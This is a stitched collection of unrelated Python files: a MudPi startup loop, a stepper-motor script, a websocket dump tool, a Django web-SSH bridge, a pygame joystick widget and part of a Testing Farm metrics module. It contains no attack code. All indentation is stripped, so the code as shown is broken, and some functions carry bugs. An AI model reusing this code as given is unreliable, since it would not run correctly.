Logger.log(LOG_LEVEL["info"], 'MudPi Node Workers...\t\t\t\033[1;31m Disabled\033[0;0m')
# try:
# if (CONFIGS['server'] is not None):
# Logger.log(LOG_LEVEL["info"], 'MudPi Server...\t\t\t\t\033[1;33m Starting\033[0;0m', end='\r', flush=True)
# time.sleep(1)
# server = MudpiServer(main_thread_running, CONFIGS['server']['host'], CONFIGS['server']['port'])
# s = threading.Thread(target=server_worker) # TODO where is server_worker supposed to be initialized?
# threads.append(s)
# s.start()
# except KeyError:
# Logger.log(LOG_LEVEL["info"], 'MudPi Socket Server...\t\t\t\033[1;31m Disabled\033[0;0m')
Logger.log(LOG_LEVEL["info"], 'MudPi Garden Controls...\t\t\033[1;32m Initialized\033[0;0m')
Logger.log(LOG_LEVEL["info"], 'Engaging MudPi Workers...\t\t\033[1;32m \033[0;0m')
for worker in workers:
t = worker.run()
threads.append(t)
time.sleep(.5)
for node in nodes:
t = node.run()
threads.append(t)
time.sleep(.5)
time.sleep(.5)
Logger.log(LOG_LEVEL["info"], 'MudPi Garden Control...\t\t\t\033[1;32m Online\033[0;0m')
Logger.log(LOG_LEVEL["info"], '_________________________________________________')
system_ready.set() # Workers will not process until system is ready
r.set('started_at', str(datetime.datetime.now())) # Store current time to track uptime
system_message = {'event':'SystemStarted', 'data':1}
r.publish('mudpi', json.dumps(system_message))
# Hold the program here until its time to graceful shutdown
while PROGRAM_RUNNING:
# Main program loop
# add logging or other system operations here...
time.sleep(0.1)
except KeyboardInterrupt:
PROGRAM_RUNNING = False
finally:
Logger.log(LOG_LEVEL["info"], 'MudPi Shutting Down...')
# Perform any cleanup tasks here...
try:
server.sock.shutdown(socket.SHUT_RDWR)
except:
pass
# Clear main running event to signal threads to close
main_thread_running.clear()
# Shutdown the camera loop
camera_available.clear()
# Join all our threads for shutdown
for thread in threads:
thread.join()
Logger.log(LOG_LEVEL["info"], "MudPi Shutting Down...\t\t\t\033[1;32m Complete\033[0;0m")
Logger.log(LOG_LEVEL["info"], "Mudpi is Now...\t\t\t\t\033[1;31m Offline\033[0;0m")
|
motor_step.py | import RPi.GPIO as GPIO
from RpiMotorLib import RpiMotorLib
import multiprocessing as mp
#define GPIO pins
GPIO_pins = (17, 27, 22)
direction= 20
step = 21
motor = RpiMotorLib.A4988Nema(direction, step, GPIO_pins, "A4988")
#class Motor_step():
def motor_step_run():
#print ("Motor Running")
motor.motor_go(False, "Full" , 1500,.006, False, .05)
#motor.motor_stop()
def motor_step_stop():
self.st = False
if(__name__=='__main__'):
p1 = mp.Process(target=motor_step_run)
p1.start()
print('สั่งงานไปแล้ว')
name = input("Enter name: ")
print (name) |
wsdump.py | #!/home/guilherme/Programming/Python/Reddit_Bot/bin/python3
import argparse
import code
import sys
import threading
import time
import ssl
import six
from six.moves.urllib.parse import urlparse
import websocket
try:
import readline
except ImportError:
pass
def get_encoding():
encoding = getattr(sys.stdin, "encoding", "")
if not encoding:
return "utf-8"
else:
return encoding.lower()
OPCODE_DATA = (websocket.ABNF.OPCODE_TEXT, websocket.ABNF.OPCODE_BINARY)
ENCODING = get_encoding()
class VAction(argparse.Action):
def __call__(self, parser, args, values, option_string=None):
if values is None:
values = "1"
try:
values = int(values)
except ValueError:
values = values.count("v") + 1
setattr(args, self.dest, values)
def parse_args():
parser = argparse.ArgumentParser(description="WebSocket Simple Dump Tool")
parser.add_argument("url", metavar="ws_url",
help="websocket url. ex. ws://echo.websocket.org/")
parser.add_argument("-p", "--proxy",
help="proxy url. ex. http://127.0.0.1:8080")
parser.add_argument("-v", "--verbose", default=0, nargs='?', action=VAction,
dest="verbose",
help="set verbose mode. If set to 1, show opcode. "
"If set to 2, enable to trace websocket module")
parser.add_argument("-n", "--nocert", action='store_true',
help="Ignore invalid SSL cert")
parser.add_argument("-r", "--raw", action="store_true",
help="raw output")
parser.add_argument("-s", "--subprotocols", nargs='*',
help="Set subprotocols")
parser.add_argument("-o", "--origin",
help="Set origin")
parser.add_argument("--eof-wait", default=0, type=int,
help="wait time(second) after 'EOF' received.")
parser.add_argument("-t", "--text",
help="Send initial text")
parser.add_argument("--timings", action="store_true",
help="Print timings in seconds")
parser.add_argument("--headers",
help="Set custom headers. Use ',' as separator")
return parser.parse_args()
class RawInput:
def raw_input(self, prompt):
if six.PY3:
line = input(prompt)
else:
line = raw_input(prompt)
if ENCODING and ENCODING != "utf-8" and not isinstance(line, six.text_type):
line = line.decode(ENCODING).encode("utf-8")
elif isinstance(line, six.text_type):
line = line.encode("utf-8")
return line
class InteractiveConsole(RawInput, code.InteractiveConsole):
def write(self, data):
sys.stdout.write("\033[2K\033[E")
# sys.stdout.write("\n")
sys.stdout.write("\033[34m< " + data + "\033[39m")
sys.stdout.write("\n> ")
sys.stdout.flush()
def read(self):
return self.raw_input("> ")
class NonInteractive(RawInput):
def write(self, data):
sys.stdout.write(data)
sys.stdout.write("\n")
sys.stdout.flush()
def read(self):
return self.raw_input("")
def main():
start_time = time.time()
args = parse_args()
if args.verbose > 1:
websocket.enableTrace(True)
options = {}
if args.proxy:
p = urlparse(args.proxy)
options["http_proxy_host"] = p.hostname
options["http_proxy_port"] = p.port
if args.origin:
options["origin"] = args.origin
if args.subprotocols:
options["subprotocols"] = args.subprotocols
opts = {}
if args.nocert:
opts = {"cert_reqs": ssl.CERT_NONE, "check_hostname": False}
if args.headers:
options['header'] = map(str.strip, args.headers.split(','))
ws = websocket.create_connection(args.url, sslopt=opts, **options)
if args.raw:
console = NonInteractive()
else:
console = InteractiveConsole()
print("Press Ctrl+C to quit")
def recv():
try:
frame = ws.recv_frame()
except websocket.WebSocketException:
return websocket.ABNF.OPCODE_CLOSE, None
if not frame:
raise websocket.WebSocketException("Not a valid frame %s" % frame)
elif frame.opcode in OPCODE_DATA:
return frame.opcode, frame.data
elif frame.opcode == websocket.ABNF.OPCODE_CLOSE:
ws.send_close()
return frame.opcode, None
elif frame.opcode == websocket.ABNF.OPCODE_PING:
ws.pong(frame.data)
return frame.opcode, frame.data
return frame.opcode, frame.data
def recv_ws():
while True:
opcode, data = recv()
msg = None
if six.PY3 and opcode == websocket.ABNF.OPCODE_TEXT and isinstance(data, bytes):
data = str(data, "utf-8")
if not args.verbose and opcode in OPCODE_DATA:
msg = data
elif args.verbose:
msg = "%s: %s" % (websocket.ABNF.OPCODE_MAP.get(opcode), data)
if msg is not None:
if args.timings:
console.write(str(time.time() - start_time) + ": " + msg)
else:
console.write(msg)
if opcode == websocket.ABNF.OPCODE_CLOSE:
break
thread = threading.Thread(target=recv_ws)
thread.daemon = True
thread.start()
if args.text:
ws.send(args.text)
while True:
try:
message = console.read()
ws.send(message)
except KeyboardInterrupt:
return
except EOFError:
time.sleep(args.eof_wait)
return
if __name__ == "__main__":
try:
main()
except Exception as e:
print(e)
|
ssh.py | import paramiko
import threading
from threading import Thread
from django_webssh.tools.tools import get_key_obj
import traceback
import socket
import json
zmodemszstart = b'rz\r**\x18B00000000000000\r\x8a'
zmodemszend = b'**\x18B0800000000022d\r\x8a'
zmodemrzstart = b'rz waiting to receive.**\x18B0100000023be50\r\x8a'
zmodemrzend = b'**\x18B0800000000022d\r\x8a'
zmodemcancel = b'\x18\x18\x18\x18\x18\x08\x08\x08\x08\x08'
class SSH:
def __init__(self, websocker, message):
self.websocker = websocker
self.message = message
self.cmd = ''
self.res = ''
self.zmodem = False
self.zmodemOO = False
# term 可以使用 ansi, linux, vt100, xterm, dumb,除了 dumb外其他都有颜色显示
def connect(self, host, user, password=None, ssh_key=None, port=22, timeout=30,
term='ansi', pty_width=80, pty_height=24):
try:
ssh_client = paramiko.SSHClient()
ssh_client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
if ssh_key:
key = get_key_obj(paramiko.RSAKey, pkey_obj=ssh_key, password=password) or \
get_key_obj(paramiko.DSSKey, pkey_obj=ssh_key, password=password) or \
get_key_obj(paramiko.ECDSAKey, pkey_obj=ssh_key, password=password) or \
get_key_obj(paramiko.Ed25519Key, pkey_obj=ssh_key, password=password)
ssh_client.connect(username=user, hostname=host, port=port, pkey=key, timeout=timeout)
else:
ssh_client.connect(username=user, password=password, hostname=host, port=port, timeout=timeout)
transport = ssh_client.get_transport()
self.channel = transport.open_session()
self.channel.get_pty(term=term, width=pty_width, height=pty_height)
self.channel.invoke_shell()
for i in range(2):
recv = self.channel.recv(1024).decode('utf-8')
self.message['status'] = 0
self.message['message'] = recv
message = json.dumps(self.message)
self.websocker.send(message)
self.res += recv
# 创建3个线程将服务器返回的数据发送到django websocket(1个线程都可以)
Thread(target=self.websocket_to_django).start()
# Thread(target=self.websocket_to_django).start()
# Thread(target=self.websocket_to_django).start()
except:
self.message['status'] = 2
self.message['message'] = 'connection faild...'
message = json.dumps(self.message)
self.websocker.send(message)
self.websocker.close(3001)
def resize_pty(self, cols, rows):
self.channel.resize_pty(width=cols, height=rows)
def django_to_ssh(self, data):
try:
self.channel.send(data)
if data == '\r':
data = '\n'
self.cmd += data
except Exception:
self.close()
def django_bytes_to_ssh(self, data):
try:
self.channel.send(data)
except Exception:
self.close()
def websocket_to_django(self):
try:
while True:
if self.zmodemOO:
self.zmodemOO = False
data = self.channel.recv(2)
if not len(data):
return
if data == b'OO':
self.websocker.send(bytes_data=data)
continue
else:
data = data + self.channel.recv(4096)
else:
data = self.channel.recv(4096)
if not len(data):
return
if self.zmodem:
if zmodemszend in data or zmodemrzend in data:
self.zmodem = False
if zmodemszend in data:
self.zmodemOO = True
if zmodemcancel in data:
self.zmodem = False
self.websocker.send(bytes_data=data)
else:
if zmodemszstart in data or zmodemrzstart in data:
self.zmodem = True
self.websocker.send(bytes_data=data)
else:
data = data.decode('utf-8')
self.message['status'] = 0
self.message['message'] = data
self.res += data
message = json.dumps(self.message)
self.websocker.send(message)
except:
self.close()
def close(self):
self.message['status'] = 1
self.message['message'] = 'connection closed...'
message = json.dumps(self.message)
self.websocker.send(message)
self.websocker.close()
self.channel.close()
def shell(self, data):
# 原作者使用创建线程的方式发送数据到ssh,每次发送都是一个字符,可以不用线程
# 直接调用函数性能更好
# Thread(target=self.django_to_ssh, args=(data,)).start()
self.django_to_ssh(data)
# 原作者将发送数据到django websocket的线程创建函数如果写到这,会导致每在客户端输入一个字符就创建一个线程
# 最终可能导致线程创建太多,故将其写到 connect 函数中
# Thread(target=self.websocket_to_django).start()
|
local_controller.py | import os
os.environ['PYGAME_HIDE_SUPPORT_PROMPT'] = "hide"
import pygame
import ipywidgets
from ipywidgets.widgets.trait_types import TypedTuple
from traitlets import Bool, Int, Float, Unicode, Instance, List
from ipywidgets.widgets.widget_controller import Axis, Button
import traitlets
import time
import threading
import time
def _clamp(x):
if x < -1.0:
return -1.0
elif x > 1.0:
return 1.0
else:
return x
class LocalController(ipywidgets.VBox):
index = Int(help="The id number of the controller.").tag(sync=True)
name = Unicode(read_only=True, help="The name of the controller.").tag(sync=True)
connected = Bool(read_only=True, help="Whether the gamepad is connected.").tag(sync=True)
timestamp = Float(read_only=True, help="The last time the data from this gamepad was updated.").tag(sync=True)
buttons = List(Instance(Button), read_only=True)
axes = List(Instance(Axis), read_only=True)
def __init__(self, index=0):
pygame.init()
if pygame.joystick.get_count() < 1:
raise RuntimeError("No joystick devices found.")
try:
self._joystick = pygame.joystick.Joystick(index)
except:
raise RuntimeError("Could not connect to joystick with index {index}".format(index=index))
name = self._joystick.get_name()
index = self._joystick.get_id()
num_buttons = self._joystick.get_numbuttons()
num_axes = self._joystick.get_numaxes()
buttons = [Button() for i in range(num_buttons)]
axes = [Axis() for i in range(num_axes)]
self.set_trait('axes', axes)
self.set_trait('buttons', buttons)
self.set_trait('name', name)
self.set_trait('index', index)
self.set_trait('connected', True)
axesBox = ipywidgets.HBox(axes)
buttonsBox = ipywidgets.HBox(buttons)
nameLabel = ipywidgets.Label(value=name)
self._init_joystick_values()
self._thread = None
self._running = False
self._start()
super().__init__(children=(axesBox, buttonsBox, nameLabel))
def _init_joystick_values(self):
for i in range(self._joystick.get_numaxes()):
self.axes[i].set_trait('value', _clamp(self._joystick.get_axis(i)))
for j in range(self._joystick.get_numbuttons()):
self.buttons[i].set_trait('value', self._joystick.get_button(i))
self.buttons[i].set_trait('pressed', self._joystick.get_button(i))
def run(self):
while self._running:
events = pygame.event.get()
timestamp = time.monotonic_ns()
for event in events:
if event.type == pygame.JOYAXISMOTION and event.joy == self.index:
axis = event.axis
self.set_trait('timestamp', timestamp)
self.axes[axis].set_trait('value', _clamp(event.value))
elif event.type == pygame.JOYBUTTONDOWN and event.joy == self.index:
button = event.button
self.set_trait('timestamp', timestamp)
self.buttons[button].set_trait('value', 1.0)
self.buttons[button].set_trait('pressed', True)
elif event.type == pygame.JOYBUTTONUP and event.joy == self.index:
button = event.button
self.set_trait('timestamp', timestamp)
self.buttons[button].set_trait('value', 0.0)
self.buttons[button].set_trait('pressed', False)
time.sleep(0.01)
def _start(self):
if self._thread is None:
self._thread = threading.Thread(target=self.run)
self._running = True
self._thread.start()
def _stop(self):
if self._thread is not None:
self._running = False
self._thread.join()
self._thread = None
|
metrics.py | # Copyright Contributors to the Testing Farm project.
# SPDX-License-Identifier: Apache-2.0
"""
Classes and functions dealing with metrics.
Our metrics are stored in the database. To transport them through our code, we use dataclasses based on
:py:class:`MetricsBase` class. These are then responsible for loading their data from the database and
conversion to Prometheus-compatible objects, and for providing easy-to-use methods to update metrics
in their area.
Our metrics are split into several sections, grouped together by the subsystem or other shared properties,
and together they form a tree of :py:class:`MetricsBase` classes, starting with :py:class:`Metrics` which
then links to :py:class:`DBMetrics` and other areas. :py:class:`MetricsBase` itself is *not* a dataclass
since it provides only methods, and therefore does not need to be declared as container - that's left
to its offsprings.
"""
import dataclasses
import datetime
import enum
import json
import os
import platform
import threading
import time
from typing import Any, Callable, Dict, List, Optional, Tuple, Type, TypeVar, Union, cast
import gluetool.log
import prometheus_client.utils
import redis
import sqlalchemy
import sqlalchemy.orm.session
import sqlalchemy.sql.schema
from gluetool.result import Ok, Result
from prometheus_client import CollectorRegistry, Counter, Gauge, Histogram, Info, generate_latest
from . import __VERSION__, DATETIME_FMT, Failure, SerializableContainer
from . import db as artemis_db
from . import safe_call
from .cache import dec_cache_field, dec_cache_value, get_cache_value, inc_cache_field, inc_cache_value, \
iter_cache_fields, iter_cache_keys, set_cache_value
from .context import DATABASE, SESSION, with_context
from .guest import GuestState
from .knobs import KNOB_POOL_ENABLED, KNOB_WORKER_PROCESS_METRICS_TTL
T = TypeVar('T')
# Guest age buckets are not all same, but:
#
# * first hour split into intervals of 5 minutes,
# * next 47 hours, by hour,
# * and the rest.
GUEST_AGE_BUCKETS = \
list(range(300, 3600, 300)) \
+ list(range(3600, 49 * 3600, 3600)) \
+ [prometheus_client.utils.INF]
# Message processing time buckets, in milliseconds. Spanning from 5 milliseconds up to 900 seconds.
# Taken from the Prometheus middleware Dramatiq provides - not suited for our needs, but the bucket
# setup is not incompatible with our architecture.
MESSAGE_DURATION_BUCKETS = (
# -> 1s
5, 10, 25, 50, 75, 100, 250, 500, 750, 1000,
# -> 10s
2500, 5000, 7500, 10000,
# -> 60s
30000, 60000,
# -> 600s/10m
120000, 180000, 240000, 300000, 360000, 420000, 480000, 540000, 600000,
# -> 900s/15m
900000,
prometheus_client.utils.INF
)
# Machine provisioning time buckets, in seconds. Spanning from 60 seconds up to 24 hours.
# First hour split by minute, next 23 hours, by hour
PROVISION_DURATION_BUCKETS = \
list(range(60, 3600, 60)) \
+ list(range(3600, 23 * 3600 + 3600, 3600)) \
+ [prometheus_client.utils.INF]
# HTTP request processing time buckets, in milliseconds. Spanning from 5 milliseconds up to 15 seconds.
HTTP_REQUEST_DURATION_BUCKETS = (
# -> 1s
5, 10, 25, 50, 75, 100, 250, 500, 750, 1000,
# -> 15s
2500, 5000, 7500, 10000, 15000,
prometheus_client.utils.INF
)
# CLI call duration buckets, in seconds. Spanning from 1 second up to 10 minutes.
CLI_CALL_DURATION_BUCKETS = (
# -> 60 seconds
1, 2, 5, 10, 20, 30, 40, 50, 60,
# -> 600 seconds
120, 180, 240, 300, 360, 420, 480, 540, 600,
prometheus_client.utils.INF
)
@dataclasses.dataclass
class WorkerTrafficTask(SerializableContainer):
"""
One "task" as recorded for the purpose of exposing current workload of various workers.
"""
workername: str
worker_pid: int
worker_tid: int
ctime: datetime.datetime
queue: str
actor: str
args: Dict[str, Union[str, None]]
def serialize_to_json(self) -> Dict[str, Any]:
"""
Serialize container to JSON.
:returns: serialized form of container items.
"""
serialized = super().serialize_to_json()
serialized['ctime'] = serialized['ctime'].strftime(DATETIME_FMT)
return serialized
@classmethod
def unserialize_from_json(cls, serialized: Dict[str, Any]) -> 'WorkerTrafficTask':
"""
Unserialize container from JSON.
:param serialized: serialized form of container.
:returns: unserialized container.
"""
serialized['ctime'] = datetime.datetime.strptime(serialized['ctime'], DATETIME_FMT)
return cls(**serialized)
def reset_counters(metric: Union[Counter, Gauge]) -> None:
"""
Reset each existing labeled metric to zero. After that, we can use ``inc()`` again.
:param metric: metric whose labeled sub-metrics we need to reset.
"""
for labeled_metric in metric._metrics.values():
labeled_metric._value.set(0)
def reset_histogram(metric: Histogram) -> None:
"""
Reset each bucket and the total sum to zero. After that, the metric is ready to be filled with updated data.
:param metric: histogram to reset.
"""
if hasattr(metric, '_metrics'):
for labeled_metric in metric._metrics.values():
labeled_metric._sum.set(0)
for i, _ in enumerate(metric._upper_bounds):
labeled_metric._buckets[i].set(0)
else:
metric._sum.set(0)
for i, _ in enumerate(metric._upper_bounds):
metric._buckets[i].set(0)
class MetricsBase:
"""
Base class for all containers carrying metrics around.
"""
_metric_container_fields: List['MetricsBase']
def __post_init__(self) -> None:
"""
Collect all fields that are child classes of this base class.
This list is then used to automagically call :py:func:`sync` and other methods for these fields.
.. note::
This method is called by dataclasses implementation,
see https://docs.python.org/3.7/library/dataclasses.html#post-init-processing
"""
self._metric_container_fields = [
self.__dict__[field.name]
for field in dataclasses.fields(self)
if isinstance(self.__dict__[field.name], MetricsBase)
]
def sync(self) -> None:
"""
Load values from the storage and update this container with up-to-date values.
.. note::
**Requires** the context variables defined in :py:mod:`tft.artemis` to be set properly.
The default implementation delegates the call to all child fields that are descendants of ``MetricsBase``
class.
"""
for container in self._metric_container_fields:
container.sync()
def register_with_prometheus(self, registry: CollectorRegistry) -> None:
"""
Register instances of Prometheus metrics with the given registry.
The default implementation delegates the call to all child fields that are descendants of ``MetricsBase``
class.
:param registry: Prometheus registry to attach metrics to.
"""
for container in self._metric_container_fields:
container.register_with_prometheus(registry)
def update_prometheus(self) -> None:
"""
Update values of Prometheus metric instances with the data in this container.
The default implementation delegates the call to all child fields that are descendants of ``MetricsBase``
class.
"""
for container in self._metric_container_fields:
container.update_prometheus()
@dataclasses.dataclass
class DBPoolMetrics(MetricsBase):
"""
Database connection pool metrics.
"""
#: Total number of connections allowed to exist in the pool.
size: int = 0
#: Number of connections in the use.
checked_in_connections: int = 0
#: Number of idle connections.
checked_out_connections: int = 0
#: Maximal "overflow" of the pool, i.e. how many connections above the :py:attr:`size` are allowed.
current_overflow: int = 0
def sync(self) -> None:
"""
Load values from the storage and update this container with up-to-date values.
"""
super(DBPoolMetrics, self).sync()
db = DATABASE.get()
if not hasattr(db.engine.pool, 'size') or not callable(db.engine.pool.size):
self.size = 0
self.checked_in_connections = 0
self.checked_out_connections = 0
self.current_overflow = 0
return
self.size = db.engine.pool.size()
self.checked_in_connections = db.engine.pool.checkedin()
self.checked_out_connections = db.engine.pool.checkedout()
self.current_overflow = db.engine.pool.overflow()
def register_with_prometheus(self, registry: CollectorRegistry) -> None:
"""
Register instances of Prometheus metrics with the given registry.
:param registry: Prometheus registry to attach metrics to.
"""
super(DBPoolMetrics, self).register_with_prometheus(registry)
self.POOL_SIZE = Gauge(
'db_pool_size',
'Maximal number of connections available in the pool',
registry=registry
)
self.POOL_CHECKED_IN = Gauge(
'db_pool_checked_in',
'Current number of connections checked in',
registry=registry
)
self.POOL_CHECKED_OUT = Gauge(
'db_pool_checked_out',
'Current number of connections out',
registry=registry
)
self.POOL_OVERFLOW = Gauge(
'db_pool_overflow',
'Current overflow of connections',
registry=registry
)
def update_prometheus(self) -> None:
"""
Update values of Prometheus metric instances with the data in this container.
"""
super(DBPoolMetrics, self).update_prometheus()
self.POOL_SIZE.set(self.size)
self.POOL_CHECKED_IN.set(self.checked_in_connections)
self.POOL_CHECKED_OUT.set(self.checked_out_connections)
self.POOL_OVERFLOW.set(self.current_overflow)
@dataclasses.dataclass
class DBMetrics(MetricsBase):
"""
Database metrics.
"""
#: Database connection pool metrics.
pool: DBPoolMetrics = DBPoolMetrics()
class PoolResourcesMetricsDimensions(enum.Enum):
"""
Which of the pool resource metrics to track, limits or usage.
"""
LIMITS = 'LIMITS'
USAGE = 'USAGE'
@dataclasses.dataclass
class PoolNetworkResources:
"""
Describes current values of a single (virtual) network available to the pool.
"""
# The idea is to store IPv4 and IPv6 as different networks. Might not work, though, in that case we can rename
# this field, e.g. `ipv4_addresses`, and add IPv6 variant. Let's see how it aligns with the real world out there.
addresses: Optional[int] = None
"""
Number of IP addresses.
"""
@dataclasses.dataclass
class PoolResources(MetricsBase):
"""
Describes current values of pool resources.
The class is intentionally left "dimension-less", not tied to limits nor usage side of the equation, as the
actual resource types do not depend on this information.
All fields are optional, leaving them unset signals the pool driver is not able/not interested in tracking
the given field.
This is a main class we use for transporting resources metrics between
interested parties.
.. note::
Memory and diskspace is tracked as integers, not using :py:class:`pint.Quantity`. This will be resolved
to stick with Pint wherever we use a value with units.
"""
_KEY = 'metrics.pool.{poolname}.resources.{dimension}'
_KEY_UPDATED_TIMESTAMP = 'metrics.pool.{poolname}.resources.{dimension}.updated_timestamp'
_TRIVIAL_FIELDS = ('instances', 'cores', 'memory', 'diskspace', 'snapshots')
_COMPOUND_FIELDS = ('networks',)
instances: Optional[int]
"""
Number of instances (or machines, VMs, servers, etc. - depending on pool's
terminology).
"""
cores: Optional[int]
"""
Number of CPU cores. Given the virtual nature of many pools, cores are more
common commodity than CPUs.
"""
memory: Optional[int]
"""
Size of RAM, in bytes.
"""
diskspace: Optional[int]
"""
Size of disk space, in bytes.
"""
snapshots: Optional[int]
"""
Number of instance snapshots.
"""
networks: Dict[str, PoolNetworkResources] = dataclasses.field(default_factory=dict)
"""
Network resources, i.e. number of addresses and other network-related metrics.
"""
updated_timestamp: Optional[float] = None
"""
Time when these metrics were updated, as UNIX timestamp.
"""
def __init__(self, poolname: str, dimension: PoolResourcesMetricsDimensions) -> None:
"""
Resource metrics of a particular pool.
:param poolname: name of the pool whose metrics we're tracking.
:param dimension: whether this instance describes limits or usage.
"""
super(PoolResources, self).__init__()
self._key = PoolResources._KEY.format(poolname=poolname, dimension=dimension.value)
self._key_updated_timestamp = PoolResources._KEY_UPDATED_TIMESTAMP.format(
poolname=poolname, dimension=dimension.value
)
self.instances = None
self.cores = None
self.memory = None
self.diskspace = None
self.snapshots = None
self.networks = {}
self.updated_timestamp = None
self.__post_init__()
@with_context
def sync(self, cache: redis.Redis) -> None:
"""
Load values from the storage and update this container with up-to-date values.
:param cache: cache instance to use for cache access.
"""
super(PoolResources, self).sync()
r_serialized = safe_call(cast(Callable[[str], Optional[str]], cache.get), self._key)
# TODO: needs fix when we start catching errors in metric handling
if r_serialized.is_error:
return
serialized = json.loads(r_serialized.unwrap() or '{}')
# Since we decided to store in the simplest possible manner, loading is where we "pay the price".
#
# We have the serialized JSON blob representing the original `PoolResources` instance, with its fields
# now being keys and so on. We can replace values in this class by using this serialized blob and storing
# it in our `__dict__`, except for `networks`. In the serialized form, `networks` is a list of mappings,
# and we need to restore it as a list of dataclasses. Therefore, `networks` need a bit more work,
# constructing a list of classes from each mapping.
self.__dict__.update(serialized)
self.networks = {
network_name: PoolNetworkResources(**serialized_network)
for network_name, serialized_network in serialized.get('networks', {}).items()
}
updated = cast(
Callable[[str], Optional[bytes]],
cache.get
)(self._key_updated_timestamp)
self.updated_timestamp = updated if updated is None else float(updated)
@with_context
def store(self, cache: redis.Redis) -> None:
"""
Store currently carried values in the storage.
:param cache: cache instance to use for cache access.
"""
# Storing the data can be actually quite simple: since we're using dataclasses, we can serialize the whole
# container as a JSON blob. There's no need to store each field as a separate key.
#
# This method will take care of serialization of `networks` list as well, since `asdict` can deal with
# nested dataclasses.
safe_call(
cast(Callable[[str, str], None], cache.set),
self._key,
json.dumps(dataclasses.asdict(self))
)
safe_call(
cast(Callable[[str, float], None], cache.set),
self._key_updated_timestamp,
datetime.datetime.timestamp(datetime.datetime.utcnow())
)
class PoolResourcesUsage(PoolResources):
"""
Describes current usage of pool resources.
"""
def __init__(self, poolname: str) -> None:
"""
Resource usage of a particular pool.
:param poolname: name of the pool whose metrics we're tracking.
"""
super(PoolResourcesUsage, self).__init__(poolname, PoolResourcesMetricsDimensions.USAGE)
class PoolResourcesLimits(PoolResources):
"""
Describes current limits of pool resources.
"""
def __init__(self, poolname: str) -> None:
"""
Resource limits of a particular pool.
:param poolname: name of the pool whose metrics we're tracking.
"""
super(PoolResourcesLimits, self).__init__(poolname, PoolResourcesMetricsDimensions.LIMITS)
@dataclasses.dataclass
class PoolResourcesDepleted:
"""
Describes whether and which pool resources have been depleted.
"""
available_network_count: int = 0
instances: bool = False
cores: bool = False
memory: bool = False
diskspace: bool = False
snapshots: bool = False
# Depleted networks are listed as names only, no deeper structure. We could change this to mapping between
# network names and, for example, a boolean or a structure describing which network resource is depleted, but
# at this moment, all we need to know is whether or not is the network depleted, nothing more.
networks: List[str] = dataclasses.field(default_factory=list)
def is_depleted(self) -> bool:
"""
Test whether any of resources is marked as depleted.
:returns: ``True`` when any of the fields is marked as depleted, or if there are available networks
but all of them are marked as depleted; ``False`` otherwise.
"""
return any([getattr(self, field) for field in PoolResources._TRIVIAL_FIELDS]) \
or (self.available_network_count != 0 and len(self.networks) == self.available_network_count)
def depleted_resources(self) -> List[str]:
"""
Collect depleted resources.
:returns: list of names of depleted resources. Trivial resources (CPU cores, RAM, etc.) are represented
by their names, networks are represented as network name prefixed with ``network.``, e.g. ``network.foo``.
"""
return [
fieldname
for fieldname in PoolResources._TRIVIAL_FIELDS
if getattr(self, fieldname) is True
] + [
'network.{}'.format(network_name)
for network_name in self.networks
]
@dataclasses.dataclass
class PoolResourcesMetrics(MetricsBase):
"""
Describes resources of a pool, both limits and usage.
"""
limits: PoolResourcesLimits
usage: PoolResourcesUsage
def __init__(self, poolname: str) -> None:
"""
Resource metrics of a particular pool.
:param poolname: name of the pool whose metrics we're tracking.
"""
self.limits = PoolResourcesLimits(poolname)
self.usage = PoolResourcesUsage(poolname)
self.__post_init__()
def get_depletion(
self,
is_enough: Callable[[str, int, int], bool]
) -> PoolResourcesDepleted:
"""
Compare limits and usage and yield :py:class:`PoolResourcesDepleted` instance describing depleted resources.
:param is_enough: a callback called for every resource, with resource name,
its limit and usage as arguments. Returns ``True`` when there is enough
resources, ``False`` otherwise.
:returns: :py:class:`PoolResourcesDepleted` instance listing which resources are depleted.
"""
delta = PoolResourcesDepleted()
for fieldname in PoolResources._TRIVIAL_FIELDS:
limit, usage = getattr(self.limits, fieldname), getattr(self.usage, fieldname)
# Skip undefined values: if left undefined, pool does not care about this dimension.
if not limit or not usage:
continue
setattr(delta, fieldname, not is_enough(fieldname, limit, usage))
delta.available_network_count = len(self.limits.networks)
for network_name, network_limit in self.limits.networks.items():
network_usage = self.usage.networks.get(network_name)
# Networks that don't report any usage are treated as having enough resources - again, pool does not care
# about this network enough to provide data.
if network_usage is None:
continue
if network_limit.addresses is None or network_usage.addresses is None:
continue
if is_enough(f'network.addresses.{network_name}', network_limit.addresses, network_usage.addresses):
continue
delta.networks.append(network_name)
return delta
ResourceCostType = int
class ResourceType(enum.Enum):
"""
Resource type used in cost tracking.
"""
VIRTUAL_MACHINE = 'virtual-machine'
DISK = 'disk'
STATIC_IP = 'static-ip'
NETWORK_INTERFACE = 'network-interface'
VIRTUAL_NETWORK = 'virtual-network'
@dataclasses.dataclass
class PoolCostsMetrics(MetricsBase):
"""
Cumulative cost produced by a pool.
"""
virtual_machine: Optional[ResourceCostType]
disk: Optional[ResourceCostType]
static_ip: Optional[ResourceCostType]
network_interface: Optional[ResourceCostType]
virtual_network: Optional[ResourceCostType]
def __init__(self, poolname: str) -> None:
"""
Cost metrics of a particular pool.
:param poolname: name of the pool whose costs we are tracking.
"""
self._key = 'metrics.pool.{poolname}.cost.cumulative_cost'.format(poolname=poolname)
self.virtual_machine = None
self.disk = None
self.static_ip = None
self.network_interface = None
self.virtual_network = None
@with_context
def sync(self, cache: redis.Redis, logger: gluetool.log.ContextAdapter) -> None:
"""
Load values from the storage and update this container with up-to-date values.
:param cache: cache instance to use for cache access.
:param logger: logger to use for logging.
"""
for field, count in get_metric_fields(logger, cache, self._key).items():
setattr(self, field.replace('-', '_'), count)
@with_context
def inc_costs(
self,
resource_type: ResourceType,
value: ResourceCostType,
cache: redis.Redis,
logger: gluetool.log.ContextAdapter
) -> None:
"""
Increment cost.
:param cache: cache instance to use for cache access.
:param logger: logger to use for logging.
:param value: value (in cents) to increase the cumulative_cost.
:param resource_type: resource type whose value is being incremented.
"""
inc_metric_field(logger, cache, self._key, resource_type.value, value)
@dataclasses.dataclass
class PoolMetrics(MetricsBase):
"""
Metrics of a particular pool.
"""
_KEY_ERRORS = 'metrics.pool.{poolname}.errors'
_KEY_CLI_CALLS = 'metrics.pool.{poolname}.cli-calls'
_KEY_CLI_EXIT_CODES = 'metrics.pool.{poolname}.cli-calls.exit-codes'
_KEY_CLI_CALLS_DURATIONS = 'metrics.pool.{poolname}.cli-calls.durations'
# Image & flavor refresh process does not have their own metrics, hence using this container to track the "last
# update" timestamp.
